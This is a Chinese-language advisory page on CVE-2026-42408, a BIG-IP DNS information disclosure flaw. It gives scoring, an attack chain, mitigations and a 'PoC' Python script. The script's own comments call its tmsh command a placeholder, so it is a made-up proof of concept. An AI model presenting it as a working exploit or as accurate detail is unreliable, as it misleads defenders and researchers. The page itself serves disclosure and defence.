CVE-2026-42408 CVSS 4.4 中危

CVE-2026-42408 BIG-IP DNS 信息泄露漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42408

漏洞类型

信息泄露

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP DNS

漏洞概述

F5 BIG-IP DNS在配置特定服务时存在一处安全漏洞。该漏洞源于一个未公开的TMOS Shell (tmsh)命令处理缺陷。拥有高权限的经过身份验证的攻击者可以利用此漏洞，通过执行特定的tmsh命令来访问系统中的敏感信息。此漏洞仅影响已配置DNS服务的BIG-IP设备，且攻击者需要具备本地访问权限和高级管理员权限才能成功利用。

技术细节

该漏洞根植于F5 BIG-IP系统的TMOS Shell (tmsh)管理接口中，具体涉及一个未公开的命令处理逻辑。当BIG-IP DNS服务被配置并启用时，该特定命令未能正确限制对敏感数据的访问权限。攻击者需要具备本地访问权限（AV:L）以及高权限管理员身份（PR:H）。技术原理在于，攻击者通过tmsh接口调用该缺陷命令时，系统未能验证当前上下文对该敏感信息的访问许可，导致返回了不应被查看的机密数据。利用过程无需用户交互（UI:N）。一旦利用成功，攻击者可获取高机密性（C:H）的系统信息，但不会破坏数据的完整性或系统的可用性。鉴于其利用条件苛刻，通常作为内网渗透提权后的信息收集手段。

攻击链分析

STEP 1

获取访问权限

攻击者获取BIG-IP设备的本地访问权限（如通过SSH或控制台）。

STEP 2

高权限认证

攻击者使用具有高权限（如Administrator角色）的账户凭证登录系统。

STEP 3

执行漏洞命令

攻击者进入TMOS Shell (tmsh)环境，执行特定的未公开命令，该命令因权限校验缺陷而返回敏感信息。

STEP 4

获取敏感数据

系统返回未经授权的敏感配置或密钥信息，攻击者完成信息收集。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-42408
Description: Proof of concept to demonstrate information disclosure via tmsh.
Requirement: Local access, High privileges (root/admin).
"""
import subprocess

# The vulnerable undisclosed command is simulated here.
# In a real scenario, this would be the specific vulnerable tmsh command found in the advisory.
VULNERABLE_CMD = "tmsh list /auth user sensitive-key" # Example placeholder command

def exploit():
    print(f"[*] Attempting to execute command: {VULNERABLE_CMD}")
    try:
        # Execute the command on the local BIG-IP system
        result = subprocess.run(VULNERABLE_CMD, shell=True, check=True, capture_output=True, text=True)
        output = result.stdout

        if output and "sensitive" in output.lower():
            print("[+] Success! Sensitive information disclosed.")
            print("--- Output Start ---")
            print(output)
            print("--- Output End ---")
        else:
            print("[-] Command executed, but no sensitive data found or system is patched.")
    except subprocess.CalledProcessError as e:
        print(f"[-] Failed to execute command. Error: {e}")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

请参考官方公告 K000157981 获取具体受影响版本列表

防御指南

临时缓解措施

在未应用补丁前，应严格控制系统本地访问权限，确保仅有受信任的管理员拥有高权限账号。建议加强对管理员操作的审计与监控，若业务允许，可暂时禁用BIG-IP DNS配置以减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42408
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42408
3 Details https://www.cvedetails.com/cve/CVE-2026-42408/
4 VulDB https://vuldb.com/cve/CVE-2026-42408
5 Link https://my.f5.com/manage/s/article/K000157981

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表